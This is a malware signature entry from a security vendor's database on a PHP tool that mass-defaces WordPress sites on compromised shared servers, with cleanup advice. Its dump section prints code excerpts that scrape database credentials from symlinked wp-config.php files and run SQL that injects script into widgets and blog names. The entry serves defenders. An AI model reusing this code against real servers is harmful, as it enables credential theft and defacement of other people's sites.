Malware Signatures

  1. Home
  2. Malware Signatures
  3. php.hacktool.massdeface.001

php.hacktool.massdeface.001

WP Mass Deface is a tool that automates defacement of WordPress blogs on shared servers. It is used on the third stage of an attack when
hackers have already penetrated to one of the server accounts and managed to create symlinks to
the rest sites on the server. At the time of the attack beginning they have a list of URLs to wp-config.php files (via symlinks they are displayed as regular text files) on all the sites on the compromised server
.
WP Mass Deface script uses this list of wp-config.php files to obtain mySql credentials and names of WordPress tables of those blogs. Then it routinely connects to each database and creates a WordPress widget with a "defacement message"
on each of the blog. Additionally it adds the message to the blog name.

Affecting

Any servers with enabled PHP and installed mySql. WordPress is not required to start this attack however this tool can only deface WordPress sites.

Cleanup

Delete the massdeface script. Find and delete symlinks created by hackers. Server admins should properly isolate user account and prevent Apache from following symlinks (this may be incompatible with some software though).
You should also consider all mySql credentials on this server compromised and have all server users change them. Addtionally changining all WordPress passwords is a good idea.
Scan your server for other types of malware and specifically for backdoors.
Defaced sites should fix their WP databases. Specifically, "widget_text", "sidebars_widgets", "blogname", "blog_charset" options in the wp_options table. Most of the options can be fixed directly in the WordPress admin interface:
remove malicious messages from general settings and widgets.

You can sign up with us and let our team remove the malware for you.

Dump

... excerpts ...

<title>SEYTANAUYDUM WP MASS</title>

...

<body bgcolor="black">
<center>
<pre>
__ __ __ __ _____ __
/ / | / | | __ / _|
/ / / __ | / | __ _ ___ ___ | | | | ___| |_ __ _ ___ ___
/ / / '_ | |/| |/ _` / __/ __| | | | |/ _ _/ _` |/ __/ _
/ /| |_) | | | | | (_| __ __ | |__| | __/ || (_| | (_| __/
/ / | .__/ |_| |_|__,_|___/___/ |_____/ ___|_| __,_|______|
| |
|_|
</pre>
</center>
<form method="POST" action="" >
<center>
<table border='1'><tr><td>List of All Symlink</td><td>
<input type="text" name="url" size="100" value="list.txt"></td></tr>

...

preg_match_all('|define.*(.*'DB_NAME'.*,.*'(.*)'.*).*;|isU',$code,$b1);
$db=$b1[1][0];
preg_match_all('|define.*(.*'DB_USER'.*,.*'(.*)'.*).*;|isU',$code,$b2);
$user=$b2[1][0];
preg_match_all('|define.*(.*'DB_PASSWORD'.*,.*'(.*)'.*).*;|isU',$code,$b3);
$db_password=$b3[1][0];
preg_match_all('|define.*(.*'DB_HOST'.*,.*'(.*)'.*).*;|isU',$code,$b4);
$host=$b4[1][0];
preg_match_all('|$table_prefix.*=.*'(.*)'.*;|isU',$code,$b5);

...

$s2=strToHex(($source));
$s="<script>document.documentElement.innerHTML = unescape(''$s2'');</script>";
$ls=strlen($s)-2;
$sql="update ".$p."options set option_value='a:2:{i:2;a:3:{s:5:"title";s:0:"";s:4:"text";s:$ls:"$s";s:6:"filter";b:0;}s:12:"_multiwidget";i:1;}' where option_name='widget_text'; ";
mysql_query($sql) ;
$sql="update ".$p."options set option_value='a:7:{s:19:"wp_inactive_widgets";a:6:{i:0;s:10:"archives-2";i:1;s:6:"meta-2";i:2;s:8:"search-2";i:3;s:12:"categories-2";i:4;s:14:"recent-posts-2";i:5;s:17:"recent-comments-2";}s:9:"sidebar-1";a:1:{i:0;s:6:"text-2";}s:9:"sidebar-2";a:0:{}s:9:"sidebar-3";a:0:{}s:9:"sidebar-4";a:0:{}s:9:"sidebar-5";a:0:{}s:13:"array_version";i:3;}' where option_name='sidebars_widgets';";

...

$sql = "UPDATE `".$p."options` SET `option_value` = '$source2' WHERE `option_name` = 'blogname';";
@mysql_query($sql) ; ;
$sql= "UPDATE `".$p."options` SET `option_value` = 'UTF-7' WHERE `option_name` = 'blog_charset';";